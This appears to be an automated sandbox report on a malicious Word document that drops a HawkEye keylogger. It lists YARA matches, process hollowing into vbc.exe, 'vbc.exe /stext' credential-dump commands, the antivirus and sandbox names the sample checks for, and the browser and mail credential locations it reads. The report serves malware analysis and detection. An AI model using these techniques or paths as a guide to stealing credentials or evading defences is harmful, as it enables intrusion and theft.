Source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
Source: 9.2.izux978537.scr.400000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 9.2.izux978537.scr.400000.1.unpack, u202d????????????????????????????????????????.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.izux978537.scr.400000.1.unpack, u200b????????????????????????????????????????.cs Security API names: System.Void System.IO.DirectoryInfo::SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void Microsoft.Win32.RegistryKey::SetAccessControl(System.Security.AccessControl.RegistrySecurity)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Security.Principal.IdentityReference System.Security.Principal.SecurityIdentifier::Translate(System.Type)
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs Security API names: System.Void System.Security.AccessControl.RegistrySecurity::AddAccessRule(System.Security.AccessControl.RegistryAccessRule)
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: classification engine Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@13/9@1/1
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040F37C FindResourceA,SizeofResource,LoadResource,LockResource, 10_2_0040F37C
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$SWIFT.doc
Source: C:\Users\user\AppData\Roaming\izux978537.scr Mutant created: \Sessions\1\BaseNamedObjects\ae5d6307-0d62-4e92-938b-debeac1db00e
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD519.tmp
Source: C:\Users\user\AppData\Roaming\izux978537.scr Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\izux978537.scr WMI Queries: IWbemServices::ExecQuery - SELECT ProcessorId FROM Win32_Processor
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\izux978537.scr Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts
Source: SWIFT.doc Virustotal: Detection: 44%
Source: SWIFT.doc ReversingLabs: Detection: 47%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'
Source: C:\Users\user\AppData\Roaming\izux978537.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\izux978537.scr File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: SWIFT.doc Static file information: File size 1258700 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: c:\Projects\VS2005\mailpv\Command-Line\mailpv.pdb source: izux978537.scr, 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: 9.2.izux978537.scr.400000.1.unpack, u202a????????????????????????????????????????.cs .Net Code: ????????????????????????????????????????? System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404841 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA, 10_2_00404841
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024A0D2 pushad ; ret 9_2_0024A0D9
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024F198 push edi; retf 9_2_0024F199
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024BAB0 pushad ; iretd 9_2_0024BAB1
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024A480 push esp; retf 001Ah 9_2_0024A489
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0024EDAB push FFD2B0BAh; retf 9_2_0024EDB8
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_005BA600 push ebx; ret 9_2_005BA601
Source: C:\Users\user\AppData\Roaming\izux978537.scr Code function: 9_2_0060747C push esp; retf 9_2_0060747D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00412341 push ecx; ret 10_2_00412351
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00412360 push eax; ret 10_2_00412374
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00412360 push eax; ret 10_2_0041239C

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr

Hooking and other Techniques for Hiding and Protection:

Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040FCBC memset,strcpy,memset,strcpy,strcat,strcpy,strcat,strcpy,strcat,GetModuleHandleA,LoadLibraryExA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 10_2_0040FCBC
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM_3
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\izux978537.scr WMI Queries: IWbemServices::ExecQuery - SELECT MacAddress FROM Win32_NetworkAdapterConfiguration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: WIRESHARK.EXE
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\izux978537.scr Thread delayed: delay time: 600000
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604 Thread sleep time: -120000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2604 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1980 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2244 Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2244 Thread sleep time: -105000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 2052 Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900 Thread sleep time: -1200000s >= -30000s
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900 Thread sleep count: 107 > 30
Source: C:\Users\user\AppData\Roaming\izux978537.scr TID: 1900 Thread sleep time: -107000s >= -30000s
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Roaming\izux978537.scr WMI Queries: IWbemServices::ExecQuery - SELECT ProcessorId FROM Win32_Processor
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\AppData\Roaming\izux978537.scr Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen, 10_2_0040702D
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to dynamically determine API calls
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00404841 GetModuleHandleA,LoadLibraryA,GetProcAddress,FreeLibrary,#17,MessageBoxA, 10_2_00404841
Enables debug privileges
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

.NET source code references suspicious native API functions
Source: 9.2.izux978537.scr.400000.1.unpack, u200d????????????????????????????????????????.cs Reference to suspicious API methods: ('?????????????????????????????????????????', 'FindResource@kernel32.dll'), ('?????????????????????????????????????????', 'capGetDriverDescriptionA@avicap32.dll'), ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('????????????????????????????????????????', 'LoadLibrary@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll'), ('?????????????????????????????????????????', 'ReadProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'GetProcAddress@kernel32.dll')
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory allocated: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign processes
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Users\user\AppData\Roaming\izux978537.scr base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000 value starts with: 4D5A
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\izux978537.scr Section unmapped: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base address: 400000
Writes to foreign memory regions
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 400000
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 401000
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 413000
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 417000
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 419000
Source: C:\Users\user\AppData\Roaming\izux978537.scr Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe base: 7EFDE008
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Users\user\AppData\Roaming\izux978537.scr C:\Users\user\AppData\Roaming\izux978537.scr
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp'
Source: C:\Users\user\AppData\Roaming\izux978537.scr Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp'
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: izux978537.scr, 00000009.00000002.2374532770.00000000012E0000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Roaming\izux978537.scr Queries volume information: C:\Users\user\AppData\Roaming\izux978537.scr VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_004073B6 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy, 10_2_004073B6
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: 10_2_00406282 GetVersionExA, 10_2_00406282
Source: C:\Users\user\AppData\Roaming\izux978537.scr Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings:

AV process strings found (often used to terminate AV products)
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: bdagent.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: MSASCui.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avguard.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgrsx.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avcenter.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avp.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: zlclient.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgcsrvx.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgnt.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: hijackthis.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgui.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: avgwdsvc.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: mbam.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: MsMpEng.exe
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp Binary or memory string: ComboFix.exe

Stealing of Sensitive Information:

Yara detected HawkEye Keylogger
Source: Yara match File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE
Yara detected M00nD3v Logger
Source: Yara match File source: 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Yara detected MailPassView
Source: Yara match File source: 00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000003.2226541368.0000000004335000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2376684630.0000000002C3A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2376638694.0000000002C1E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2378260409.0000000003B31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2378154261.0000000002D45000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 1492, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 948, type: MEMORY
Source: Yara match File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match File source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Searches for Windows Mail specific files
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new unknown
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery *
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Stationery unknown
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\izux978537.scr File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Tries to steal Instant Messenger accounts or passwords
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Tries to steal Mail credentials (via file access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Tries to steal Mail credentials (via file registry)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword 10_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword 10_2_00402D74
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Code function: ESMTPPassword 10_2_004033B1
Shows file infection / information gathering behavior (enumerates multiple directories for files)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe Directory queried: number of queries: 1002

Remote Access Functionality:

Detected HawkEye Rat
